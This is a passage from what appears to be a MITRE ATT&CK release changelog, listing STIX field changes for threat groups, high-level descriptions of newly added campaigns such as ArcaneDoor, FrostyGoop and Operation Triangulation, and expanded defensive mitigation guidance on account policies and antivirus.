external_references[33]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
external_references[33]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
x_mitre_version | 5.1 | 5.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
aliases | | GruesomeLarch |
external_references | | {'source_name': 'GruesomeLarch', 'description': '(Citation: Nearest Neighbor Volexity)'} |
external_references | | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
x_mitre_version | 4.1 | 4.2 |
Patches
[G1028] APT-C-23
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 15:31:48.747000+00:00 | 2024-11-17 20:01:55.806000+00:00 |
external_references[7]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
external_references[7]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[G0097] Bouncing Golf
Current version: 1.0
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-26 20:58:44.722000+00:00 | 2025-04-16 21:22:02.103000+00:00 |
[G0142] Confucius
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-22 20:43:16.504000+00:00 | 2025-04-16 20:37:36.476000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1019] MoustachedBouncer
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-26 14:34:08.342000+00:00 | 2025-04-16 20:37:40.255000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0112] Windshift
Current version: 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-26 14:37:33.234000+00:00 | 2024-11-17 14:15:51.850000+00:00 |
external_references[2]['description'] | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020. | Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf | https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868 |
ics-attack
Major Version Changes
[G0049] OilRig
Current version: 5.0
Version changed from: 4.1 → 5.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-09-04 20:33:04.739000+00:00 | 2025-01-16 18:55:49.463000+00:00 |
x_mitre_version | 4.1 | 5.0 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
aliases | | Earth Simnavaz |
aliases | | Crambus |
aliases | | TA452 |
external_references | | {'source_name': 'TA452', 'description': '(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)'} |
external_references | | {'source_name': 'Crambus', 'description': '(Citation: Symantec Crambus OCT 2023)'} |
external_references | | {'source_name': 'Earth Simnavaz', 'description': '(Citation: Trend Micro Earth Simnavaz October 2024)'} |
external_references | | {'source_name': 'Trend Micro Earth Simnavaz October 2024', 'description': 'Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html'} |
external_references | | {'source_name': 'Proofpoint Iranian Aligned Attacks JAN 2020', 'description': 'Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.', 'url': 'https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect'} |
external_references | | {'source_name': 'Symantec Crambus OCT 2023', 'description': 'Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.', 'url': 'https://www.security.com/threat-intelligence/crambus-middle-east-government'} |
x_mitre_contributors | | Jaesang Oh, KC7 Foundation |
Minor Version Changes
[G0082] APT38
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | ['Hiroki Nagahama, NEC Corporation', 'Manikantan Srinivasan, NEC Corporation India', 'Pooja Natarajan, NEC Corporation India'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-08-26 16:33:33.984000+00:00 | 2025-01-22 21:54:11.727000+00:00 |
external_references[11]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
x_mitre_version | 3.0 | 3.1 |
[G0032] Lazarus Group
Current version: 4.1
Version changed from: 4.0 → 4.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-11 16:06:34.699000+00:00 | 2025-04-16 17:21:11.622000+00:00 |
x_mitre_version | 4.0 | 4.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | MyungUk Han, ASEC |
x_mitre_contributors | | Jun Hirata, NEC Corporation |
x_mitre_contributors | | Manikantan Srinivasan, NEC Corporation India |
x_mitre_contributors | | Pooja Natarajan, NEC Corporation India |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
x_mitre_version | 4.1 | 4.2 |
Patches
[G1000] ALLANITE
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-05-24 19:26:10.721000+00:00 | 2025-04-16 21:26:23.407000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0037] FIN6
Current version: 4.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-08 22:13:27.588000+00:00 | 2024-11-17 14:59:25.749000+00:00 |
external_references[8]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
[G0115] GOLD SOUTHFIELD
Current version: 2.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-28 20:49:53.223000+00:00 | 2025-04-16 20:37:38.397000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0102] Wizard Spider
Current version: 4.0
Description diff (old → new): the two texts are identical except for the spelling fix "aresenal" → "arsenal" in "possesses a diverse arsenal of tools"; the full old and new description values are listed in the Details table.
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-03 20:21:34.872000+00:00 | 2025-03-12 20:33:21.597000+00:00 |
description | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
Campaigns
enterprise-attack
New Campaigns
[C0051] APT28 Nearest Neighbor Campaign
Current version: 1.0
Description:
APT28 Nearest Neighbor Campaign was conducted by APT28 from early February 2022 to November 2024 against organizations and individuals with expertise on Ukraine. APT28 primarily leveraged living-off-the-land techniques, while also leveraging the zero-day exploitation of CVE-2022-38028. Notably, APT28 leveraged Wi-Fi networks in close proximity to the intended target to gain initial access to the victim environment. By daisy-chaining multiple compromised organizations near the intended target, APT28 discovered dual-homed systems (with both a wired and a wireless network connection) to enable Wi-Fi and used compromised credentials to connect to the victim network.(Citation: Nearest Neighbor Volexity)
[C0046] ArcaneDoor
Current version: 1.0
Description:
ArcaneDoor is a campaign targeting networking devices from Cisco and other vendors between July 2023 and April 2024, primarily focused on government and critical infrastructure networks. ArcaneDoor is associated with the deployment of the custom backdoors Line Runner and Line Dancer. ArcaneDoor is attributed to a group referred to as UAT4356 or STORM-1849, and is assessed to be a state-sponsored campaign.(Citation: Cisco ArcaneDoor 2024)(Citation: CCCS ArcaneDoor 2024)
[C0053] FLORAHOX Activity
Current version: 1.0
Description:
FLORAHOX Activity is conducted using a hybrid operational relay box (ORB) network, which combines two types of infrastructure: compromised devices and leased Virtual Private Servers (VPS). The compromised devices include end-of-life routers and IoT devices, while VPS space is commercially leased and managed by ORB network administrators. This hybrid ORB network allows adversaries to proxy and obscure malicious traffic, making the source of the traffic more difficult to trace.
The FLORAHOX ORB network has been leveraged by multiple cyber threat actors, including China-nexus actors like ZIRCONIUM. These adversaries conduct espionage campaigns through FLORAHOX Activity, relying on the ORB network's ability to funnel traffic through Tor nodes, provisioned VPS servers, and compromised routers to obfuscate malicious traffic.(Citation: ORB Mandiant)
[C0041] FrostyGoop Incident
Current version: 1.0
Description:
FrostyGoop Incident took place in January 2024 against a municipal district heating company in Ukraine. Following initial access via likely exploitation of external facing services, FrostyGoop was used to manipulate ENCO control systems via legitimate Modbus commands to impact the delivery of heating services to Ukrainian civilians.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
[C0043] Indian Critical Infrastructure Intrusions
Current version: 1.0
Description:
Indian Critical Infrastructure Intrusions is a sequence of intrusions from 2021 through early 2022 linked to People’s Republic of China (PRC) threat actors, particularly RedEcho and Threat Activity Group 38 (TAG38). The intrusions appear focused on IT system breach in Indian electric utility entities and logistics firms, as well as potentially managed service providers operating within India. Although focused on OT-operating entities, there is no evidence this campaign was able to progress beyond IT breach and information gathering to OT environment access.(Citation: RecordedFuture RedEcho 2021)(Citation: RecordedFuture RedEcho 2022)
[C0050] J-magic Campaign
Current version: 1.0
Description:
The J-magic Campaign was active from mid-2023 to at least mid-2024 and featured the use of the J-magic backdoor, a custom cd00r variant tailored for use against Juniper routers. The J-magic Campaign targeted Junos OS routers serving as VPN gateways primarily in the semiconductor, energy, manufacturing, and IT sectors. (Citation: Lumen J-Magic JAN 2025)
[C0044] Juicy Mix
Current version: 1.0
Description:
Juicy Mix was a campaign conducted by OilRig throughout 2022 that targeted Israeli organizations with the Mango backdoor.(Citation: ESET OilRig Campaigns Sep 2023)
[C0049] Leviathan Australian Intrusions
Current version: 1.0
Description:
Leviathan Australian Intrusions consisted of at least two long-term intrusions against victims in Australia by Leviathan, relying on similar tradecraft such as external service exploitation followed by extensive credential capture and re-use to enable privilege escalation and lateral movement. Leviathan Australian Intrusions were focused on exfiltrating sensitive data including valid credentials for the victim organizations.(Citation: CISA Leviathan 2024)
[C0048] Operation MidnightEclipse
Current version: 1.0
Description:
Operation MidnightEclipse was a campaign conducted in March and April 2024 that involved initial exploitation of the zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
[C0042] Outer Space
Current version: 1.0
Description:
Outer Space was a campaign conducted by OilRig throughout 2021 that used the SampleCheck5000 downloader and Solar backdoor to target Israeli organizations.(Citation: ESET OilRig Campaigns Sep 2023)
[C0047] RedDelta Modified PlugX Infection Chain Operations
Current version: 1.0
Description:
RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.(Citation: Recorded Future RedDelta 2025)
[C0052] SPACEHOP Activity
Current version: 1.0
Description:
SPACEHOP Activity is conducted through commercially leased Virtual Private Servers (VPS), otherwise known as provisioned Operational Relay Box (ORB) networks. The network leveraged for SPACEHOP Activity enabled China-nexus cyber threat actors – such as APT5 and Ke3chang – to perform network reconnaissance scanning and vulnerability exploitation. SPACEHOP Activity has historically targeted entities in North America, Europe, and the Middle East.(Citation: ORB Mandiant)
[C0045] ShadowRay
Current version: 1.0
Description:
ShadowRay was a campaign that began in late 2023 targeting the education, cryptocurrency, biopharma, and other sectors through a vulnerability (CVE-2023-48022), itself named ShadowRay, in the Ray AI framework. According to security researchers, ShadowRay was the first known instance of AI workloads being actively exploited in the wild through vulnerabilities in AI infrastructure. CVE-2023-48022, which allows access to compute resources and sensitive data on exposed instances, remains unpatched and has been disputed by the vendor, who maintains that Ray is not intended for use outside of a strictly controlled network environment.(Citation: Oligo ShadowRay Campaign MAR 2024)
Patches
[C0028] 2015 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-06 14:05:01.054000+00:00 | 2024-12-18 18:59:44.199000+00:00 |
external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
[C0025] 2016 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-10 21:18:24.743000+00:00 | 2025-04-16 20:37:46.567000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0010] C0010
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-10-04 20:18:28.362000+00:00 | 2025-04-16 20:37:46.129000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0011] C0011
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-09-22 20:26:23.226000+00:00 | 2025-04-16 20:37:47.897000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0015] C0015
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-09-29 20:37:46.689000+00:00 | 2025-04-16 20:37:46.910000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0017] C0017
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-01-25 21:02:33.515000+00:00 | 2025-04-16 20:37:47.537000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0018] C0018
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-02-14 16:34:50.791000+00:00 | 2025-04-16 20:37:46.763000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0021] C0021
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-05 16:50:07.875000+00:00 | 2025-04-16 20:37:47.096000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0027] C0027
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-07-05 17:59:41.843000+00:00 | 2025-04-16 20:37:45.650000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0004] CostaRicto
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-10-05 15:54:36.557000+00:00 | 2025-04-16 20:37:46.418000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0001] Frankenstein
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-22 03:55:03.775000+00:00 | 2025-04-16 20:37:47.239000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0007] FunnyDream
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-10-10 16:19:33.560000+00:00 | 2025-04-16 20:37:45.985000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0012] Operation CuckooBees
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-22 05:06:05.468000+00:00 | 2025-04-16 20:37:46.274000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0023] Operation Ghost
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-06 20:25:30.658000+00:00 | 2025-04-16 20:37:47.386000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0013] Operation Sharpshooter
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-10-13 17:10:55.334000+00:00 | 2025-04-16 20:37:47.743000+00:00 |
x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[C0014] Operation Wocao
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-22 05:07:13.071000+00:00 | 2025-04-16 20:37:45.828000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0030] Triton Safety Instrumented System Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-04-17 16:17:07.038000+00:00 | 2024-11-17 16:15:02.223000+00:00 |
external_references[3]['description'] | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021. | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html | https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html |
mobile-attack
New Campaigns
[C0054] Operation Triangulation
Current version: 1.0
Description:
Operation Triangulation is a mobile campaign targeting iOS devices.(Citation: SecureList OpTriangulation 01Jun2023) The unidentified actors used zero-click exploits in iMessage attachments to gain Initial Access, then executed exploits and validators, such as Binary Validator before finally executing the TriangleDB implant.
ics-attack
New Campaigns
[C0041] FrostyGoop Incident
Current version: 1.0
Description:
The FrostyGoop Incident took place in January 2024 against a municipal district heating company in Ukraine. Following initial access via likely exploitation of external-facing services, FrostyGoop was used to manipulate ENCO control systems via legitimate Modbus commands to impact the delivery of heating services to Ukrainian civilians.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
Patches
[C0028] 2015 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-06 14:05:01.054000+00:00 | 2024-12-18 18:59:44.199000+00:00 |
external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
[C0025] 2016 Ukraine Electric Power Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-10 21:18:24.743000+00:00 | 2025-04-16 20:37:46.567000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0020] Maroochy Water Breach
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-05 22:00:43.353000+00:00 | 2025-04-16 21:26:23.900000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[C0030] Triton Safety Instrumented System Attack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-04-17 16:17:07.038000+00:00 | 2024-11-17 16:15:02.223000+00:00 |
external_references[3]['description'] | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021. | Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html | https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html |
Mitigations
enterprise-attack
Minor Version Changes
[M1036] Account Use Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Configure features related to account use like login attempt lockouts, specific login times, etc.
New description:
Account Use Policies help mitigate unauthorized access by configuring and enforcing rules that govern how and when accounts can be used. These policies include enforcing account lockout mechanisms, restricting login times, and setting inactivity timeouts. Proper configuration of these policies reduces the risk of brute-force attacks, credential theft, and unauthorized access by limiting the opportunities for malicious actors to exploit accounts. This mitigation can be implemented through the following measures:
Account Lockout Policies:
- Implementation: Configure account lockout settings so that after a defined number of failed login attempts (e.g., 3-5 attempts), the account is locked for a specific time period (e.g., 15 minutes) or requires an administrator to unlock it.
- Use Case: This prevents brute-force attacks by limiting how many incorrect password attempts can be made before the account is temporarily disabled, reducing the likelihood of an attacker successfully guessing a password.
Login Time Restrictions:
- Implementation: Set up login time policies to restrict when users or groups can log into systems. For example, only allowing login during standard business hours (e.g., 8 AM to 6 PM) for non-administrative accounts.
- Use Case: This prevents unauthorized access outside of approved working hours, where login attempts might be more suspicious or harder to monitor. For example, if an account that is only supposed to be active during the day logs in at 2 AM, it should raise an alert or be blocked.
Inactivity Timeout and Session Termination:
- Implementation: Enforce session timeouts after a period of inactivity (e.g., 10-15 minutes) and require users to re-authenticate if they wish to resume the session.
- Use Case: This policy prevents attackers from hijacking active sessions left unattended. For example, if an employee walks away from their computer without locking it, an attacker with physical access to the system would be unable to exploit the session.
Password Aging Policies:
- Implementation: Enforce password aging rules, requiring users to change their passwords after a defined period (e.g., 90 days) and ensure passwords are not reused by maintaining a password history.
- Use Case: This limits the risk of compromised passwords being used indefinitely. Regular password changes make it more difficult for attackers to reuse stolen credentials.
Account Expiration and Deactivation:
- Implementation: Configure user accounts, especially for temporary or contract workers, to automatically expire after a set date or event. Accounts that remain unused for a specific period should be deactivated automatically.
- Use Case: This prevents dormant accounts from becoming an attack vector. For example, an attacker can exploit unused accounts if they are not properly monitored or deactivated.
**Tools for Implementation**:
- Group Policy Objects (GPOs) in Windows: To enforce account lockout thresholds, login time restrictions, session timeouts, and password policies.
- Identity and Access Management (IAM) solutions: For centralized management of user accounts, session policies, and automated deactivation of accounts.
- Security Information and Event Management (SIEM) platforms: To monitor and alert on unusual login activity, such as failed logins or out-of-hours access attempts.
- Multi-Factor Authentication (MFA) Tools: To further enforce secure login attempts, preventing brute-force or credential stuffing attacks.
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-10-21 15:52:18.525000+00:00 | 2024-12-10 15:55:53.913000+00:00 |
description | Configure features related to account use like login attempt lockouts, specific login times, etc. | Account Use Policies help mitigate unauthorized access by configuring and enforcing rules that govern how and when accounts can be used. These policies include enforcing account lockout mechanisms, restricting login times, and setting inactivity timeouts. Proper configuration of these policies reduces the risk of brute-force attacks, credential theft, and unauthorized access by limiting the opportunities for malicious actors to exploit accounts. This mitigation can be implemented through the following measures:
Account Lockout Policies:
- Implementation: Configure account lockout settings so that after a defined number of failed login attempts (e.g., 3-5 attempts), the account is locked for a specific time period (e.g., 15 minutes) or requires an administrator to unlock it.
- Use Case: This prevents brute-force attacks by limiting how many incorrect password attempts can be made before the account is temporarily disabled, reducing the likelihood of an attacker successfully guessing a password.
Login Time Restrictions:
- Implementation: Set up login time policies to restrict when users or groups can log into systems. For example, only allowing login during standard business hours (e.g., 8 AM to 6 PM) for non-administrative accounts.
- Use Case: This prevents unauthorized access outside of approved working hours, where login attempts might be more suspicious or harder to monitor. For example, if an account that is only supposed to be active during the day logs in at 2 AM, it should raise an alert or be blocked.
Inactivity Timeout and Session Termination:
- Implementation: Enforce session timeouts after a period of inactivity (e.g., 10-15 minutes) and require users to re-authenticate if they wish to resume the session.
- Use Case: This policy prevents attackers from hijacking active sessions left unattended. For example, if an employee walks away from their computer without locking it, an attacker with physical access to the system would be unable to exploit the session.
Password Aging Policies:
- Implementation: Enforce password aging rules, requiring users to change their passwords after a defined period (e.g., 90 days) and ensure passwords are not reused by maintaining a password history.
- Use Case: This limits the risk of compromised passwords being used indefinitely. Regular password changes make it more difficult for attackers to reuse stolen credentials.
Account Expiration and Deactivation:
- Implementation: Configure user accounts, especially for temporary or contract workers, to automatically expire after a set date or event. Accounts that remain unused for a specific period should be deactivated automatically.
- Use Case: This prevents dormant accounts from becoming an attack vector. For example, an attacker can exploit unused accounts if they are not properly monitored or deactivated.
**Tools for Implementation**:
- Group Policy Objects (GPOs) in Windows: To enforce account lockout thresholds, login time restrictions, session timeouts, and password policies.
- Identity and Access Management (IAM) solutions: For centralized management of user accounts, session policies, and automated deactivation of accounts.
- Security Information and Event Management (SIEM) platforms: To monitor and alert on unusual login activity, such as failed logins or out-of-hours access attempts.
- Multi-Factor Authentication (MFA) Tools: To further enforce secure login attempts, preventing brute-force or credential stuffing attacks.
|
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[M1049] Antivirus/Antimalware
Current version: 1.2
Version changed from: 1.1 → 1.2
Old description:
Use signatures or heuristics to detect malicious software.
New description:
Antivirus/Antimalware solutions utilize signatures, heuristics, and behavioral analysis to detect, block, and remediate malicious software, including viruses, trojans, ransomware, and spyware. These solutions continuously monitor endpoints and systems for known malicious patterns and suspicious behaviors that indicate compromise. Antivirus/Antimalware software should be deployed across all devices, with automated updates to ensure protection against the latest threats. This mitigation can be implemented through the following measures:
Signature-Based Detection:
- Implementation: Use predefined signatures to identify known malware based on unique patterns such as file hashes, byte sequences, or command-line arguments. This method is effective against known threats.
- Use Case: When malware like "Emotet" is detected, its signature (such as a specific file hash) matches a known database of malicious software, triggering an alert and allowing immediate quarantine of the infected file.
Heuristic-Based Detection:
- Implementation: Deploy heuristic algorithms that analyze behavior and characteristics of files and processes to identify potential malware, even if it doesn’t match a known signature.
- Use Case: If a program attempts to modify multiple critical system files or initiate suspicious network communications, heuristic analysis may flag it as potentially malicious, even if no specific malware signature is available.
Behavioral Detection (Behavior Prevention):
- Implementation: Use behavioral analysis to detect patterns of abnormal activities, such as unusual system calls, unauthorized file encryption, or attempts to escalate privileges.
- Use Case: Behavioral analysis can detect ransomware attacks early by identifying behavior like mass file encryption, even before a specific ransomware signature has been identified.
Real-Time Scanning:
- Implementation: Enable real-time scanning to automatically inspect files and network traffic for signs of malware as they are accessed, downloaded, or executed.
- Use Case: When a user downloads an email attachment, the antivirus solution scans the file in real-time, checking it against both signatures and heuristics to detect any malicious content before it can be opened.
Cloud-Assisted Threat Intelligence:
- Implementation: Use cloud-based threat intelligence to ensure the antivirus solution can access the latest malware definitions and real-time threat feeds from a global database of emerging threats.
- Use Case: Cloud-assisted antivirus solutions quickly identify newly discovered malware by cross-referencing against global threat databases, providing real-time protection against zero-day attacks.
**Tools for Implementation**:
- Endpoint Security Platforms: Use solutions such as EDR for comprehensive antivirus/antimalware protection across all systems.
- Centralized Management: Implement centralized antivirus management consoles that provide visibility into threat activity, enable policy enforcement, and automate updates.
- Behavioral Analysis Tools: Leverage solutions with advanced behavioral analysis capabilities to detect malicious activity patterns that don’t rely on known signatures.
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-03-31 13:07:15.684000+00:00 | 2024-12-10 15:58:23.136000+00:00 |
description | Use signatures or heuristics to detect malicious software. | Antivirus/Antimalware solutions utilize signatures, heuristics, and behavioral analysis to detect, block, and remediate malicious software, including viruses, trojans, ransomware, and spyware. These solutions continuously monitor endpoints and systems for known malicious patterns and suspicious behaviors that indicate compromise. Antivirus/Antimalware software should be deployed across all devices, with automated updates to ensure protection against the latest threats. This mitigation can be implemented through the following measures:
Signature-Based Detection:
- Implementation: Use predefined signatures to identify known malware based on unique patterns such as file hashes, byte sequences, or command-line arguments. This method is effective against known threats.
